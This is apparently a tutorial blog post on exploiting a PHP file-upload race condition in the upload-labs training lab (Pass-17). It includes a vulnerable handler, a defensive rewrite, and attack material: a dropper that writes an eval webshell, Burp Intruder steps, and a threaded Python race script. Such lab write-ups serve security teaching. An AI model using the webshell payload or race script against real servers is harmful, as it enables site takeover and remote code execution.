Conditional competition for PHP file upload (Part 1)

Table of contents

1. What is conditional competition

2. Scene code analysis

The PHP code used for the experiment in this article is as follows:

 Additional knowledge points:

Code analysis:

3. Conditional competition steps

1. Competition payload:

2. Competition method:

1. Burp Suite:

2. Python script:


1. What is conditional competition

In some file-upload scenarios the back-end code saves the uploaded file first and only then checks whether it is dangerous, deleting it if so. A "conditional competition", better known as a race condition, exploits exactly that ordering: our request has to race the deletion routine (for example the unlink() function) on time and on threads, so that the file is accessed before it is deleted and the attack takes effect.

2. Scene code analysis

The PHP code used for the experiment in this article is as follows:

<?php
header("Content-Type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];                   // full name of the uploaded file
$ext = substr($filename, strrpos($filename, '.') + 1); // everything after the last dot, i.e. the extension

$path = 'uploads/' . $filename;                        // destination path and file name
$tmp = $_FILES['file']['tmp_name'];                    // temporary name of the upload on the server
if (move_uploaded_file($tmp, $path))                   // move the upload to the destination FIRST
{
    if (!preg_match('/php/i', $ext))                   // THEN check whether the extension contains "php"
    {
        echo 'upload success,file in ' . $path;        // not php: report success
    }
    else
    {
        unlink($path);                                 // php: delete the file that is already in place
        die("can't upload php file!");
    }
}
else
{
    die('upload error');
}

 Additional knowledge points:

The contents of the $_FILES global array are as follows:
$_FILES['myFile']['name'] The original name of the file on the client.
$_FILES['myFile']['type'] The MIME type of the file, if the browser supplied it, e.g. "image/gif".
$_FILES['myFile']['size'] The size of the uploaded file in bytes.
$_FILES['myFile']['tmp_name'] The temporary file name under which the upload is stored on the server, normally a system default. It can be set with upload_tmp_dir in php.ini, but setting it with the putenv() function does not work.
$_FILES['myFile']['error'] The error code associated with the file upload. ['error'] was added in PHP 4.2.0. Its description follows: (the codes became constants after PHP 3.0)

Code analysis:

The code first moves the uploaded file into the target directory with move_uploaded_file, and only then tests whether the extension is php with preg_match('/php/i', $ext), a case-insensitive match. If it is, the file is deleted with unlink. Between the move and the unlink the file is already sitting in a web-reachable directory, so we need to access the uploaded file before unlink runs.
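For comparison, here is a hardened version of the handler above. It is an added example, not code from the original post or from upload-labs. It assumes the same form field name ('file'), a directory UPLOAD_DIR that the web server does not serve or execute scripts from (an assumption about the deployment), and the fileinfo extension for mime_content_type(). Every check, using exactly the $_FILES fields listed in the "Additional knowledge points" above ('error', 'tmp_name', 'size', 'name'), runs on the temporary file before move_uploaded_file() is called, so a rejected file is never placed anywhere reachable and there is no move-then-unlink window to race. The server also chooses the stored name, so the URL of a stored file cannot be predicted from the upload request.

```php
<?php
// Hardened upload handler (added example, not the page's code).
// Assumptions: form field is still "file"; UPLOAD_DIR is outside the web root
// or otherwise configured so PHP is never executed from it.
header("Content-Type:text/html;charset=utf-8");

const UPLOAD_DIR  = __DIR__ . '/../uploads_private';   // assumption: not web-reachable
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];     // allowlist, not a "php" denylist
const MAX_BYTES   = 2 * 1024 * 1024;

// Returns an error message, or null when the temp file passed every check.
// Nothing is moved here, so a rejected file never exists under the web root.
function validateUpload(array $f): ?string
{
    if (!isset($f['error']) || $f['error'] !== UPLOAD_ERR_OK) {
        return 'upload error';
    }
    if (!is_uploaded_file($f['tmp_name'])) {        // really came in via HTTP POST
        return 'not an uploaded file';
    }
    if ($f['size'] > MAX_BYTES) {
        return 'file too large';
    }
    // Extension comes from the client name but is only used for the allowlist
    // lookup; "x.php", "x.PhP" or "x.php.jpg" never pass unless the last
    // extension is in ALLOWED_EXT.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return 'file type not allowed';
    }
    // Check content, not just the name: the bytes must look like an image.
    $mime = mime_content_type($f['tmp_name']);
    if ($mime === false || strpos($mime, 'image/') !== 0) {
        return 'not an image';
    }
    return null;
}

$f = $_FILES['file'] ?? null;
if ($f === null) {
    die('upload error');
}
if (($err = validateUpload($f)) !== null) {
    die($err);                                      // temp file is discarded by PHP
}

// Server-chosen, unguessable name; client-supplied name is never used on disk.
$ext     = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
$newName = bin2hex(random_bytes(16)) . '.' . $ext;
$dest    = UPLOAD_DIR . '/' . $newName;
if (!move_uploaded_file($f['tmp_name'], $dest)) {
    die('upload error');
}
echo 'upload success, id ' . htmlspecialchars($newName);
```

The order of operations is the whole point: validate, then move. Reordering alone is not enough if the destination directory can still execute PHP, and a non-executable directory alone is not enough if the client controls the file name, so the example does both.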

3. Conditional competition steps

1. Competition payload:

Because the window in which the uploaded file can be opened is very short, it is impractical to connect to a shell through the uploaded file directly; instead, we give the uploaded file the following content

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);  ?>' ); ?>

As soon as the file is accessed once, a shell.php file is created. Even after the original file is deleted by the unlink function, the shell.php it created still exists, and the site can be taken over through shell.php

2. Competition method:

Here we take level 17 (Pass-17) of upload-labs as an example

1. Burp Suite:

Upload the file and capture the request in the proxy

Then send the captured upload request to the Intruder module

Then clear all the preset payload positions

In the Payloads tab, choose the Null payloads type and generate 2000 payloads, that is, upload the file 2000 times in a row, then start the attack

Finally, keep visiting in the browser

http://localhost/upload-labs/upload/szm.php

If the request succeeds, the shell has been planted successfully

2. Python script:

# coding:utf-8
import requests
from concurrent.futures import ThreadPoolExecutor


def td(_):
    # One attempt: upload the dropper, then immediately request it,
    # hoping to land in the window between move_uploaded_file() and unlink().
    url = 'http://localhost/upload-labs/Pass-17/index.php'
    files = {'upload_file': (
        'szm.php', "<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);  ?>' ); ?>")}
    data = {'submit': '上传'}
    requests.post(url=url, data=data, files=files)
    resp = requests.get('http://localhost/upload-labs/upload/szm.php')
    if resp.status_code == 200:
        print('上传成功')


if __name__ == '__main__':
    # 20 worker threads, 200 attempts in total
    with ThreadPoolExecutor(20) as p:
        p.map(td, range(200))


Origin blog.csdn.net/Elite__zhb/article/details/130018959